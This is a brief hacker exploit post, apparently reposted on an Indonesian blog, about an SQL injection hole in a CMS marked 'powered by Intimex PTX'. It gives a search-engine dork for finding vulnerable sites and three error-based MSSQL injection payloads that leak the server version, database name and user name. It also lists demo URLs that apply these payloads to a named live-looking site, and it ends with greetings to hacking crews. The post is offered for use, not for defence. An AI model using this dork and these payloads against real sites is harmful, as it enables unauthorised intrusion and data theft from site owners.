SQLi vuln @ Unknown CMS

"powered by Intimex PTX"

Founder: xyberbreaker
Site: http://www.lumajangcr3w.freeforums.org

Dork:
inurl:"/e/product/product_list.asp?brand_id="

exploit:
and 1=convert(int,@@version)--
and 1=convert(int,db_name())--
and 1=convert(int,user_name())--

Demo:
http://yoga4yogi2.intimexptx.com/e/product/product_list.asp?brand_id=26' and 1=convert(int,@@version)--
http://yoga4yogi2.intimexptx.com/e/product/product_list.asp?brand_id=26' and 1=convert(int,db_name())--
http://yoga4yogi2.intimexptx.com/e/product/product_list.asp?brand_id=26' and 1=convert(int,user_name())--

################################################################
Greeting To:
LumajangCrew, JatimCrew, And all of my friends
################################################################

Tweet

Rian SEO

Blogger yang senang mempelajari hal-hal baru seputar Blog, SEO dan Bisnis Online.

Subscribe to receive free email updates: